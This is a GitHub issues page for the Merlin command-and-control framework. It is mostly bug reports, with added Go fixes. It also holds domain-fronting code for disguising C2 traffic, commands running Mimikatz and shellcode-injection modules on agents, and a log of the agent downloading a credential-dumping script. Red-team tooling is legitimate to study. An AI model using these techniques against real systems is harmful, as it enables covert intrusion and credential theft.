ne0nd0g / merlin
Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.
License: GNU General Public License v3.0
To support domain fronting, the only thing needed is the ability to add a Host header to the HTTP requests.
Being able to do something like:
./merlinagent -u https://images.amazon.com -p 443 -front 1234123412341234.cloudfront.net
could add the header:
Host: 1234123412341234.cloudfront.net
to the request, and the connection would be fronted through images.amazon.com.
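How the requested Host override behaves in Go, as an added example (not Merlin's code; the -front flag above is the issue's proposal, and the CloudFront hostname is the issue's placeholder). The request URL carries the front domain, so the TCP connection and the TLS SNI go there, while req.Host carries the real distribution; net/http sends req.Host as the Host header, or as :authority on HTTP/2. A local httptest server stands in for the CDN edge so the value can be confirmed on the wire:

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// NewFrontedRequest builds a request whose connection (and TLS SNI) goes to the
// front domain in frontURL, while the Host header carries the real destination.
// net/http sends req.Host instead of req.URL.Host whenever req.Host is set; on
// HTTP/2 the same value becomes the :authority pseudo-header.
func NewFrontedRequest(method, frontURL, fronted string) (*http.Request, error) {
	req, err := http.NewRequest(method, frontURL, nil)
	if err != nil {
		return nil, err
	}
	if fronted != "" {
		req.Host = fronted
	}
	return req, nil
}

// ObservedHost sends one request to a local test server, a stand-in for the CDN
// edge, and returns the Host value the server saw, so the rewrite is confirmed
// on the wire rather than assumed.
func ObservedHost(fronted string) (string, error) {
	var seen string
	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		seen = r.Host // the value a CDN routes on
		w.WriteHeader(http.StatusOK)
	}))
	defer srv.Close()

	req, err := NewFrontedRequest(http.MethodGet, srv.URL+"/", fronted)
	if err != nil {
		return "", err
	}
	resp, err := srv.Client().Do(req)
	if err != nil {
		return "", err
	}
	resp.Body.Close()
	return seen, nil
}

func main() {
	// Hostname taken from the issue's example; it is a placeholder, not a live distribution.
	host, err := ObservedHost("1234123412341234.cloudfront.net")
	if err != nil {
		fmt.Println("request failed:", err)
		return
	}
	fmt.Println("server saw Host:", host)
}
```

Two caveats: the SNI still names the front domain, which is the point, but the large CDNs have since started rejecting requests whose Host does not match it; and the fronted hostname is visible to anyone who can inspect the decrypted request on the CDN side.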
Just a note to let you know that the "dmg" releases and builds from source for Darwin are actually Mach-O executables. Unless this was purposeful obfuscation for some reason, in which case... carry on.
$ file /.../merlinAgent-Darwin-x64-v0.6.0/merlinAgent-Darwin-x64.dmg
/.../merlinAgent-Darwin-x64-v0.6.0/merlinAgent-Darwin-x64.dmg: Mach-O 64-bit executable x86_64
No complaints from the antivirus definitions engine.
Hacktool.Mimikatz detected in the Invoke-Merlin.ps1 script
Bit hard, we have a custom Symantec AV engine.
Would be awesome if we could use dynamic DNS so we don't have to worry about all the IP changes...
It seems that the agent ID is similar to a UUID. If the agent program restarts and reconnects to the server, the agent will send another ID to the server which is different than before, and the server will store two agent IDs from the same agent. This situation always happens on some Windows PCs. Consider using some time-invariant ID, like the agent's MAC address?
v0.7.0.BETA
1b0ce52d71da62da21cc8f90b97191308e6fe7a9
Setting agent to all in a module would not generate an error when executing a module.
Setting agent to all and executing the module generates an error.
Merlin[module][shellcodeInjection]» set Agent all
[+]agent set to ffffffff-ffff-ffff-ffff-ffffffffffff
Merlin[module][shellcodeInjection]» run
[!]ffffffff-ffff-ffff-ffff-ffffffffffff is not a valid agent
ffffffff-ffff-ffff-ffff-ffffffffffff is meant to be a broadcast identifier. Merlin should cycle through all available agents and create a job. There were no agents checked in when this error was generated. The error message should state that no agents were found, not that the broadcast identifier is invalid.
Running the command cmd.exe /c dir C:\\Windows\\System32 will list the directory contents.
The directory contents are returned. However the agent dies after the results are returned.
shell cmd.exe /c dir C:\\Windows\\System32
Agent was running on a Windows 10 operating system. Agent sleep time was set to 10s. Wonder if the amount of data being returned is causing the problem?
Hello,
Thank you for your efforts in creating this nice project.
I have run into the following issue:
When running or compiling the agent:
cmd/merlinagent/main.go:154: cannot use hostUUID (type "github.com/satori/go.uuid".UUID) as type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID in field value
cmd/merlinagent/main.go:200: cannot use hostUUID (type "github.com/satori/go.uuid".UUID) as type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID in field value
cmd/merlinagent/main.go:461: cannot use hostUUID (type "github.com/satori/go.uuid".UUID) as type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID in field value
Makefile:51: recipe for target 'agent-linux' failed
make: *** [agent-linux] Error 2
Server
cmd/merlinserver/main.go:176:10: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:180:11: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:186:11: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:26: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in field value
cmd/merlinserver/main.go:317:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:318:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:319:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:320:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: too many errors
Makefile:47: recipe for target 'server-linux' failed
make: *** [server-linux] Error 2
Running it via script
go run cmd/merlinserver/main.go
cmd/merlinserver/main.go:176:10: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:180:11: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:186:11: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:26: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in field value
cmd/merlinserver/main.go:317:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:318:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:319:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:320:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: too many errors
Add a system command to the Merlin server to explicitly execute commands on the host operating system. Merlin's current default is to execute any non-Merlin command on the host OS. However, some commands are both a valid Merlin command and a host OS command, such as ls.
The case of an option name should match the one we are using to set it.
Option names in the "show options" output start with an uppercase letter, but the option itself is lowercase. This is confusing.
main.go:31:2: cannot find package "github.com/Ne0nd0g/merlin/pkg" in any of:
C:\Go\src\github.com\Ne0nd0g\merlin\pkg (from $GOROOT)
C:\Users\cyber_windows\go\src\github.com\Ne0nd0g\merlin\pkg (from $GOPATH)
main.go:32:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/agent" in any of:
C:\Go\src\github.com\Ne0nd0g\merlin\pkg\agent (from $GOROOT)
C:\Users\cyber_windows\go\src\github.com\Ne0nd0g\merlin\pkg\agent (from $GOPATH)
main.go:28:2: cannot find package "github.com/fatih/color" in any of:
C:\Go\src\github.com\fatih\color (from $GOROOT)
C:\Users\cyber_windows\go\src\github.com\fatih\color (from $GOPATH)
Same error for Linux, and the env path is set.
Transparent proxy support on Windows
No proxy support unless explicitly set using the http_proxy variable.
Set up a proxy, configure the Windows machine to use it, and try to launch the Merlin agent.
Should be enough to reproduce.
The module runs successfully
The application panics and crashes
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x80 pc=0x7408d1]
goroutine 6 [running]:
github.com/Ne0nd0g/merlin/pkg/agents.AddJob(0xffffffffffffffff, 0xffffffffffffffff, 0x84f84d, 0x3, 0xc4201d6460, 0x7, 0xa, 0x0, 0x0, 0x0, ...)
/mnt/c/Data/Dev/Go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:366 +0x511
github.com/Ne0nd0g/merlin/pkg/cli.Shell()
/mnt/c/Data/Dev/Go/src/github.com/Ne0nd0g/merlin/pkg/cli/cli.go:169 +0x2403
created by main.main
/mnt/c/Data/Dev/Go/src/github.com/Ne0nd0g/merlin/cmd/merlinserver/main.go:66 +0x472
go build -ldflags "-H=windowsgui -x main.url=https://myhost:443/" -o agent.exe cmd/merlinagent/main.go
use module windows/64/powershell/powersploit/Invoke-Mimikatz; set agent all; run
crashes the server. Also compiled with TDM-GCC as recommended. This did not fix the issue.
Success
Merlin[module][MimiPenguin]» [+]Results for job BqJhgpPTsU
[+]--2018-10-09 02:21:50-- https://raw.githubusercontent.com/huntergregal/mimipenguin/master/mimipenguin.sh
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-10-09 02:21:50 ERROR 404: Not Found.
Use the linux/x64/bash/credentials/MimiPenguin module.
Link to mimipenguin repo
When I use a port other than 443, like 8443, for SSL, I don't get a session, even if I change the port to 8443 in the merlinserver config.
Any suggestion?
v.0.7.0.BETA
1b0ce52d71da62da21cc8f90b97191308e6fe7a9
Expected the shellcodeInjection or execute-shellcode module to parse a RAW file containing shellcode bytes.
Merlin[module][shellcodeInjection]» run
[!]there was an error parsing the shellcode file:
encoding/hex: invalid byte: U+0050 'P'
Merlin[agent][fabebecf-73b2-4463-9758-0d9e2ed0ab99]» execute-shellcode self /home/Desktop/Joe/calc.bin
[!]there was an error parsing the shellcode:
encoding/hex: invalid byte: U+002F '/'
Run either the execute-shellcode function or the shellcodeInjection module pointing to a valid file.
These are two different errors. The shellcodeInjection error is because the module tries to parse the RAW file as hex instead of raw bytes. The execute-shellcode error is because it is trying to parse the string as hex instead of checking to see if the input is a file first.
Been doing Go at Udemy because of this tool, and it's amazing that I always thought Go could be hard, only to find it really sexy.
Am thinking of trying to make Merlin a little modular, like screenshots, webcam, microphone, etc.
Thanks Ne0
go build -ldflags "-H=windowsgui -X main.url=https://6.6.6.12:443/" -o merlinAgent.exe cmd/merlinagent/main.go
Get stable connection in the server
Merlin» [-]Received HTTP POST Connection from 6.6.6.46:443
[DEBUG]HTTP Connection Details:
[DEBUG]Host: 6.6.6.12:443
[DEBUG]URI: /
[DEBUG]Method: POST
[DEBUG]Protocol: HTTP/2.0
[DEBUG]Headers: map[Content-Length:[5957] Accept-Encoding:[gzip] User-Agent:[Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36] Content-Type:[application/octet-stream; charset=utf-8] Authorization:[Bearer eyJhbGciOiJkaXIiLCJjdHkiOiJKV1QiLCJlbmMiOiJBMjU2R0NNIiwidHlwIjoiSldUIn0..fQAgJ3IEDCLhT2lI.WT1eaaIoSk5veZ-bJRKr7bLUM4kd_jIkfKs9WUiaez_HIj34Nj38cO12zsCQsH8eHhdkRrWJrtjq8I24T59HvtObnpTWyY-idZMMsMbRBSA9Ub4ew2ljJyYv532KAqP60-Tkj1OK5XTPVuu6Rkzt-StycEArEwLNZPJm3XZpudDlcIUo0MMDtbWzsk1X-shc3HhYSwTw0eyVlk6VqxNv6EP9M0lPHyQsuIqWSfquNHPWZscWRtp09dhNyAg.SsI64DQ_KfTELnXCIUWMlw]]
[DEBUG]TLS Negotiated Protocol: h2
[DEBUG]TLS Cipher Suite: 49200
[DEBUG]TLS Server Name:
[DEBUG]Content Length: 5957
[DEBUG][DEBUG]POST DATA: {%!s(float32=0) 00000000-0000-0000-0000-000000000000 %!s(*json.RawMessage=&[]) }
[!]Invalid Activity:
Merlin»
Just run it...
Note that I used Linux for the server because the 0.8.0 server automatically shuts down after running on Windows 10 (tried in 2 different desktop, no vm).
I also tried the agent on MacOS and had the same issue (invalid activity).
Downgrading the agent to 0.7 fixed it but then some functionalities were not available.
Still going through the code, but wondering whether we should rename some instances here or the actual files; it seems there is a bug? I had to rename the func ExecuteCommand to EC in exec_windows inside pkg/agent.
./merlinServer-Linux-x64
zsh: exec format error: ./merlinServer-Linux-x64
Merlin on connection showing victim information about host/user/platform.
It is not showing it.
Create an executable for Windows and execute it on the victim with merlin-agent -url IP:PORT
Is there anything I can do to fix it?
Agent doesn't crash
Agent crashes
Interrupt the response to the agent
Several locations either don't check error returns, or do, but then use a nil object, which leads to a panic due to a nil pointer dereference. Offending lines I've found below:
Lines 541 to 542 in ca24c53
Lines 504 to 511 in ca24c53
Lines 702 to 711 in ca24c53
As a side note, there appears to be unchecked errors during some json decoding too. May be worth going over line-by-line and ensuring no errors are silently passed over.
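What checking the decode error, and rejecting a zero-valued message, looks like, as an added example that serves this comment and the "Invalid Activity" report above (the POST DATA line whose fields are all zero). It is not Merlin's code: the Message fields, the message type names and the version check are assumptions. DecodeLoose is the pattern the comment describes (error dropped, zero struct used anyway); DecodeStrict fails closed and names the cause, so an agent/server version mismatch is reported as one instead of as invalid activity:

```go
package main

import (
	"bytes"
	"encoding/json"
	"errors"
	"fmt"
)

// Message is a stand-in for an agent check-in. The field names are assumptions,
// not Merlin's real wire format.
type Message struct {
	Version float32         `json:"version"`
	ID      string          `json:"id"`
	Type    string          `json:"type"`
	Payload json.RawMessage `json:"payload"`
}

const nilUUID = "00000000-0000-0000-0000-000000000000"

// knownTypes is an assumed allow-list of message types the server handles.
var knownTypes = map[string]bool{"InitialCheckIn": true, "StatusCheckIn": true, "CmdResults": true}

// DecodeLoose drops the decode error and returns whatever is in the struct,
// which for a message the server does not understand is all zero values.
func DecodeLoose(data []byte) *Message {
	var m Message
	_ = json.Unmarshal(data, &m)
	return &m
}

// DecodeStrict rejects unknown fields, trailing data and zero-valued required
// fields, and says why, so the operator sees the actual problem.
func DecodeStrict(data []byte, serverVersion float32) (*Message, error) {
	dec := json.NewDecoder(bytes.NewReader(data))
	dec.DisallowUnknownFields()
	var m Message
	if err := dec.Decode(&m); err != nil {
		return nil, fmt.Errorf("malformed message: %w", err)
	}
	if dec.More() {
		return nil, errors.New("trailing data after message")
	}
	switch {
	case m.ID == "" || m.ID == nilUUID:
		return nil, errors.New("missing agent ID (agent/server version mismatch?)")
	case m.Version != serverVersion:
		return nil, fmt.Errorf("agent version %v does not match server version %v", m.Version, serverVersion)
	case !knownTypes[m.Type]:
		return nil, fmt.Errorf("unknown message type %q", m.Type)
	}
	return &m, nil
}

func main() {
	// Constructed inputs: a well-formed check-in and one a mismatched agent might send.
	good := []byte(`{"version":1,"id":"ea3e4d2c-aae0-42e7-869b-2f0d826fb256","type":"StatusCheckIn","payload":{}}`)
	bad := []byte(`{"payload":"x"}`)
	fmt.Printf("loose:  %+v (no error, all zero values)\n", *DecodeLoose(bad))
	for _, d := range [][]byte{good, bad} {
		m, err := DecodeStrict(d, 1)
		fmt.Printf("strict: %+v err=%v\n", m, err)
	}
}
```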
I think that it's not an issue of Merlin but an issue of gcc.
When I try to compile (gcc -shared -pthread -o merlin.dll merlin.c main.a -lwinmm -lntdll -lws2_32) both in windows and kali I get an error exit status and many undefined references.
Which version of gcc do you use? Have you done any special modifications?
Thanks
I like the minimal/tight nature of the framework, but not being able to create interactive shells is an impediment I'm having trouble working around effectively. Is there any plan/hope in the near future for adding interactive shell functionality? I assume it would have to be a feature of the agent and not implemented in a module?
Thank you for the hard work on the rest of the framework.
Can we have a Docker Merlin, please?
Merlin version: 0.6.0 Master
Go Version: go version go1.10.4 linux/amd64
When I try to compile the DLL with make agent-dll I get this error:
make agent-dll
export GOOS=windows GOARCH=amd64 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1;
go build -buildmode=c-archive -o data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/main.a cmd/merlinagentdll/main.go;
cp data/bin/dll/merlin.c data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360;
x86_64-w64-mingw32-gcc -shared -pthread -o data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/merlin.dll data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/merlin.c data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/main.a -lwinmm -lntdll -lws2_32
cmd/merlinagentdll/main.go:37: too many arguments in call to agent.New
have (string, bool, bool)
want (bool, bool)
cmd/merlinagentdll/main.go:38: not enough arguments in call to a.Run
have (string)
want (string, string)
x86_64-w64-mingw32-gcc: error: data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/main.a: No such file or directory
make: *** [Makefile:56: agent-dll] Error 1
When the merlinserver is already running and the victim opens the link, I have a problem on my Merlin server (TLS Handshake Error: EOF). Can anyone help me resolve this error?
TLS handshake error from 192.168..**:: remote error: unknown certificate authority
TLS handshake error from 192.168..**:**: remote error: EOF
go run
go version go1.12.7 linux/amd64
$HOME/go
On new agent connect, a folder with its ID should be created (ex. data/agents/xxxx-xxxx-xxxx) with the agent_log.txt inside.
A folder with the agent ID is created, but with incorrect permissions:
dzervas merlin> ls -la data/agents
drwxr-xr-x dzervas dzervas 4 KB Sat Jul 27 10:23:02 2019 ./
drwxr-xr-x dzervas dzervas 4 KB Fri Jul 26 17:31:52 2019 ../
d--------- dzervas dzervas 4 KB Sat Jul 27 10:21:31 2019 b4d72e27-2a68-4024-801d-b753e4fc71a0/
d--------- dzervas dzervas 4 KB Sat Jul 27 10:23:02 2019 d03f0107-4b4c-4602-acf3-10d26ec5f793/
d--------- dzervas dzervas 4 KB Fri Jul 26 18:17:36 2019 fda3db0e-ca68-4498-b61a-153965549dbd/
.rw-r--r-- dzervas dzervas 29 B Fri Jul 26 17:31:52 2019 README.MD
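Reproducing the mode bits in that listing, as an added example (not Merlin's code). Passing os.ModeDir as the permission argument is one way to get a directory with no rwx bits, since that constant carries none; whether that is the actual cause here is an assumption. 0o700 is the least-privilege choice for per-agent logs: readable by the operator account only, and still usable by the server process that writes them:

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// CreateAgentDir creates base/<agent id> with the requested permission bits and
// returns the bits the directory actually received (after the process umask),
// which is the check a server should make before writing logs there.
func CreateAgentDir(base, agentID string, perm os.FileMode) (os.FileMode, error) {
	dir := filepath.Join(base, agentID)
	if err := os.MkdirAll(dir, perm); err != nil {
		return 0, err
	}
	st, err := os.Stat(dir)
	if err != nil {
		return 0, err
	}
	return st.Mode().Perm(), nil
}

func main() {
	base, err := os.MkdirTemp("", "agents")
	if err != nil {
		fmt.Println(err)
		return
	}
	defer os.RemoveAll(base)
	// os.ModeDir has no rwx bits, so the directory comes out as d--------- (assumed
	// to be what happened in the issue). Agent IDs below are the ones from the listing.
	bad, _ := CreateAgentDir(base, "b4d72e27-2a68-4024-801d-b753e4fc71a0", os.ModeDir)
	good, _ := CreateAgentDir(base, "d03f0107-4b4c-4602-acf3-10d26ec5f793", 0o700)
	fmt.Printf("os.ModeDir -> %04o, 0o700 -> %04o\n", bad, good)
}
```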
Start server and an agent
Sending commands to the agent and receiving a response (error message or otherwise)
Sending any module to agent produces the following error:
Merlin Server:
Merlin[module][LinEnum]» set agent all
[+]agent set to ffffffff-ffff-ffff-ffff-ffffffffffff
Merlin[module][LinEnum]» run
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x80 pc=0x725936]
goroutine 20 [running]:
github.com/Ne0nd0g/merlin/pkg/agents.AddJob(0xffffffffffffffff, 0xffffffffffffffff, 0x832567, 0x3, 0xc42029c0f0, 0xa, 0xf, 0x0, 0x0, 0x0, ...)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:366 +0x506
github.com/Ne0nd0g/merlin/pkg/cli.Shell()
/root/go/src/github.com/Ne0nd0g/merlin/pkg/cli/cli.go:169 +0x21c6
created by main.main
/opt/merlin/cmd/merlinserver/main.go:66 +0x44e
The above error also happens on Linux Mint with GO path = /home/user/go and go root = /usr/lib/go-1.10
Merlin Agent:
[-]Agent version: 0.6.0 Beta
[-]Agent build: nonRelease
[-]Connecting to web server at https://127.0.0.1:443 for initial check in.
[-]Sleeping for 30.271s at 2018-08-30 02:51:02.860022733 -0400 EDT m=+0.008732155
[-]Checking in
[-]Connecting to web server at https://127.0.0.1:443 for status check in.
[+]ServerOk Message Type Received!
Sending upload/download command produces the following error:
2018/08/30 02:59:29 http2: panic serving 127.0.0.1:56328: runtime error: index out of range
goroutine 134 [running]:
net/http.(*http2serverConn).runHandler.func1(0xc42000e0d8, 0xc4202cdfaf, 0xc42034a380)
/usr/lib/go-1.10/src/net/http/h2_bundle.go:5753 +0x190
panic(0x7b26e0, 0xa94710)
/usr/lib/go-1.10/src/runtime/panic.go:502 +0x229
github.com/Ne0nd0g/merlin/pkg/agents.GetMessageForJob(0xfa4ee829dcfa8d68, 0x13fe7659137ecfac, 0xc4203f0580, 0xa, 0x832e4e, 0x6, 0x833146, 0x7, 0xc42031f350, 0x1, ...)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:503 +0x1a62
github.com/Ne0nd0g/merlin/pkg/agents.StatusCheckIn(0xdcfa8d683f800000, 0x137ecfacfa4ee829, 0x13fe7659, 0xc42026a7e0, 0xd, 0x7b3920, 0xc42026c220, 0xc4204b0000, 0x1000, 0x0, ...)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:208 +0x3b8
github.com/Ne0nd0g/merlin/pkg/servers/http2.agentHandler(0x8898a0, 0xc42000e0d8, 0xc42016e800)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/servers/http2/http2.go:248 +0xcaf
net/http.HandlerFunc.ServeHTTP(0x852418, 0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/server.go:1947 +0x44
net/http.(*ServeMux).ServeHTTP(0xc4200a16b0, 0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/server.go:2337 +0x130
net/http.serverHandler.ServeHTTP(0xc4200a3c70, 0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/server.go:2694 +0xbc
net/http.initNPNRequest.ServeHTTP(0xc42017ca80, 0xc4200a3c70, 0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/server.go:3260 +0x9a
net/http.(Handler).ServeHTTP-fm(0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/h2_bundle.go:5475 +0x4d
net/http.(http2serverConn).runHandler(0xc42034a380, 0xc42000e0d8, 0xc42016e800, 0xc42031f500)
/usr/lib/go-1.10/src/net/http/h2_bundle.go:5760 +0x89
created by net/http.(http2serverConn).processHeaders
/usr/lib/go-1.10/src/net/http/h2_bundle.go:5494 +0x46b
Any task sent to the agent crashes the server with one of the above messages. I have the same response with the pre-compiled binaries with the default https://127.0.0.1:443 url.
I have tried to recreate the certs but it didn't help. The firewall is turned off and there are no competing listeners on other ports. I suspect it may be a Go issue and not a Merlin issue, but if you have some insight it would be much appreciated.
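A registry whose AddJob handles the broadcast sentinel without dereferencing a missing agent, as an added example that serves this report, the earlier "set agent all; run crashes the server" report, and the broadcast-identifier report at the top of this page. It is not Merlin's code: the Agent, Job and Registry types, the job-ID scheme and the "no agents are checked in" wording are assumptions. The empty registry gets its own error instead of "is not a valid agent", and the broadcast path iterates whatever agents exist rather than looking up the sentinel as if it were a real ID:

```go
package main

import (
	"errors"
	"fmt"
	"sync"
)

// BroadcastID is the sentinel the CLI sets when the operator types "set agent all".
const BroadcastID = "ffffffff-ffff-ffff-ffff-ffffffffffff"

var ErrNoAgents = errors.New("no agents are checked in")

// Agent and Job are minimal stand-ins (assumed shapes, not Merlin's types).
type Agent struct {
	ID   string
	Jobs []Job
}

type Job struct {
	ID      string
	Command string
}

// Registry holds checked-in agents. The mutex matters because the HTTP handler
// and the CLI goroutine both touch it (the panics above came from the CLI goroutine).
type Registry struct {
	mu     sync.Mutex
	agents map[string]*Agent
	seq    int
}

func NewRegistry() *Registry { return &Registry{agents: map[string]*Agent{}} }

// CheckIn registers an agent on first contact; repeat check-ins are no-ops.
func (r *Registry) CheckIn(id string) {
	r.mu.Lock()
	defer r.mu.Unlock()
	if _, ok := r.agents[id]; !ok {
		r.agents[id] = &Agent{ID: id}
	}
}

// AddJob queues a command for one agent, or for every agent when id is the
// broadcast sentinel. Every map lookup is checked before use, and an empty
// registry is reported as such rather than as an invalid agent ID.
func (r *Registry) AddJob(id, command string) ([]string, error) {
	r.mu.Lock()
	defer r.mu.Unlock()

	var targets []*Agent
	if id == BroadcastID {
		for _, a := range r.agents {
			targets = append(targets, a)
		}
		if len(targets) == 0 {
			return nil, ErrNoAgents
		}
	} else {
		a, ok := r.agents[id]
		if !ok || a == nil {
			return nil, fmt.Errorf("%s is not a valid agent", id)
		}
		targets = []*Agent{a}
	}

	var jobIDs []string
	for _, a := range targets {
		r.seq++
		j := Job{ID: fmt.Sprintf("job-%d", r.seq), Command: command}
		a.Jobs = append(a.Jobs, j)
		jobIDs = append(jobIDs, j.ID)
	}
	return jobIDs, nil
}

func main() {
	r := NewRegistry()
	if _, err := r.AddJob(BroadcastID, "whoami"); err != nil {
		fmt.Println("before any check-in:", err)
	}
	// Agent IDs taken from the agent list shown later on this page.
	r.CheckIn("5adafe61-0827-49cc-a56b-fb83e1c4e803")
	r.CheckIn("ffba5858-9d51-4e2b-8747-cc54b7c0360d")
	ids, err := r.AddJob(BroadcastID, "whoami")
	fmt.Println("broadcast created", len(ids), "jobs, err:", err)
}
```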
Sometimes we need to run the server in daemon mode, not always attached.
When I run make agent-dll
I expected to get a .dll in the output directory, but did not.
Compiling to pure golang binaries for all OSes works, by the way.
cd /Users/apple/workspace/go/src/github.com/Ne0nd0g/merlin && make agent-dll
export GOOS=windows GOARCH=amd64 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1; \
go build -buildmode=c-archive -o data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206/main.a cmd/merlinagentdll/main.go; \
cp data/bin/dll/merlin.c data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206; \
x86_64-w64-mingw32-gcc -shared -pthread -o data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206/merlin.dll data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206/merlin.c data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206/main.a -lwinmm -lntdll -lws2_32
/usr/local/Cellar/mingw-w64/5.0.4_1/toolchain-x86_64/bin/x86_64-w64-mingw32-ld: /var/folders/wp/ff6sz9qs6g71jnm12nj2kbyw0000gp/T//cc4ILowZ.o:merlin.c:(.text+0xe): undefined reference to `Run'
collect2: error: ld returned 1 exit status
make[1]: *** [agent-dll] Error 1
make: *** [build-dll] Error 2
Run make agent-dll
x-MacBook-Pro:eb92bab9980f5b5d728b8a7bf15e894554ff0206 apple$ pwd
/Users/apple/workspace/go/src/github.com/Ne0nd0g/merlin/data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206
x-MacBook-Pro:eb92bab9980f5b5d728b8a7bf15e894554ff0206 apple$ ls -al
total 126872
drwxr-xr-x 11 apple staff 352 Jan 4 13:16 .
drwxr-xr-x 3 apple staff 96 Jan 4 13:13 ..
-rw-r--r-- 1 apple staff 17586928 Jan 4 13:16 main.a
-rw-r--r-- 1 apple staff 2702 Jan 4 13:16 main.h
-rw-r--r-- 1 apple staff 77 Jan 4 13:16 merlin.c
-rwxr-xr-x 1 apple staff 8089924 Jan 4 13:13 merlinAgent-Darwin-x64
